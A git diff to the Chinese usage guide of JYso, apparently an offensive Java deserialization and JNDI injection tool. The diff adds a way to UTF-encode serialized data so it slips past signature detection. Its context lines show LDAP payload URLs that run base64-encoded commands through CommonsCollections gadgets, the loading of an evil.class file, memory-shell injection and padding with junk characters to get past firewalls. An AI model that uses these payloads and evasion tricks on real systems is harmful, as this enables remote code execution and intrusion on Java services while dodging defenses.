diff --git a/JYso‐CN.md b/JYso‐CN.md index 85fc483..9d5f293 100644 --- a/JYso‐CN.md +++ b/JYso‐CN.md @@ -135,11 +135,6 @@ http://127.0.0.1:3456/setRoute?a=Deserialization/CommonsCollections6/command/Bas ![](https://gallery-1304405887.cos.ap-nanjing.myqcloud.com/markdown%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20230706103914.png) -+ 直接命令执行示例: -``` -ldap://127.0.0.1:1389/[Basic or TomcatBypass]/command/Base64/[base64_encoded_cmd] -``` - # 1.2 Echo使用 - 命令 `AllEcho`:DFS 找 Request 命令执行回显 @@ -493,7 +488,7 @@ base64 编码。 **命令执行示例**: -jdni中同理 +**JNDI中同理** ```java ldap://127.0.0.1:1389/Deserialization/CommonsCollections1/command/Base64/[base64_encoded_DL-xxx.org]) @@ -586,7 +581,7 @@ java -jar JYso-[version].jar -y -g CommonsCollections3 -p LF-/tmp/evil.class 示例:`all:xxx.dns.log` - +Base64编码all:dnslog地址,即可 ```shell java -jar JYso-[version].jar -y -g URLDNS -p 'all:xxx.dns.log' ``` @@ -624,6 +619,12 @@ ldap://127.0.0.1:1389/Deserialization/URLDNS/command/Base64/[base64_encoded_all: java -jar JYso-[version].jar -y -g CommonsBeanutils1 -p 'EX-MS-TEXMSFromThread' -dt 1 -dl 50000 ``` +通过UTF编码对原始序列化数据中 TC_CLASSDESC、TC_PROXYCLASSDESC、TC_STRING 这些强特征来3字节加密 + +```shell +java -jar JYso-[version].jar -y -g CommonsBeanutils1 -p 'EX-MS-TEXMSFromThread' -utf +``` + 可以生成填充了 50000 个脏字符的序列化数据 # 2.0 RASP 层面